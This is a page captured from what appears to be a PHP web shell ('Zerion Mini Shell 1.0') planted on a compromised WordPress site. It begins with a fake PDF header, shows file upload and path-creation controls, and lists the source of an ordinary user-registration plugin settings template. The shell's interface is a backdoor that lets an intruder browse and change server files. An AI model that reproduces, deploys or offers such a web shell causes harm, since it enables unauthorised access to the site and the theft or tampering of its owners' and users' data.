%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/19851/cwd/wp-content/plugins/user-registration/includes/admin/views/
Upload File :
Create Path :
Current File : //proc/19851/cwd/wp-content/plugins/user-registration/includes/admin/views/html-admin-settings.php

<?php
/**
 * Admin View: Settings
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

?>
<div class="wrap user-registration">
	<form method="<?php echo esc_attr( apply_filters( 'user_registration_settings_form_method_tab_' . $current_tab, 'post' ) ); ?>" id="mainform" action="" enctype="multipart/form-data">
		<header class="user-registration-header">
			<div class="ur-scroll-ui">
				<nav class="nav-tab-wrapper ur-nav ur-nav--tab ur-nav-tab-wrapper ur-scroll-ui__items">
					<?php
					foreach ( $tabs as $name => $label ) {
						echo '<a href="' . admin_url( 'admin.php?page=user-registration-settings&tab=' . $name ) . '" class="nav-tab ur-nav__link ur-scroll-ui__item ' . ( $current_tab == $name ? 'nav-tab-active is-active' : '' ) . '">' . $label . '</a>';
					}

						do_action( 'user_registration_settings_tabs' );
					?>
				</nav>
				<span class="ur-scroll-ui__scroll-nav ur-scroll-ui__scroll-nav--backward is-disabled">
					<i class="ur-scroll-ui__scroll-nav__icon dashicons dashicons-arrow-left-alt2"></i>
				</span>
				<span class="ur-scroll-ui__scroll-nav ur-scroll-ui__scroll-nav--forward">
					<i class="ur-scroll-ui__scroll-nav__icon dashicons dashicons-arrow-right-alt2"></i>
				</span>
			</div>
			<?php
				do_action( 'user_registration_sections_' . $current_tab );
			?>
		</header>
		<h1 class="screen-reader-text"><?php echo esc_html( $tabs[ $current_tab ] ); ?></h1>
		<?php
			self::show_messages();

			do_action( 'user_registration_settings_' . $current_tab );
			do_action( 'user_registration_settings_tabs_' . $current_tab ); // @deprecated hook
		?>
		<p class="submit">
			<?php if ( ! isset( $GLOBALS['hide_save_button'] ) ) : ?>
				<input name="save" class="button-primary" type="submit" value="<?php echo apply_filters( 'user-registration-setting-save-label', esc_html__( 'Save Changes', 'user-registration' ) ); ?>" />
			<?php endif; ?>
			<input type="hidden" name="subtab" id="last_tab" />
			<?php wp_nonce_field( 'user-registration-settings' ); ?>
		</p>
	</form>
</div>

Zerion Mini Shell 1.0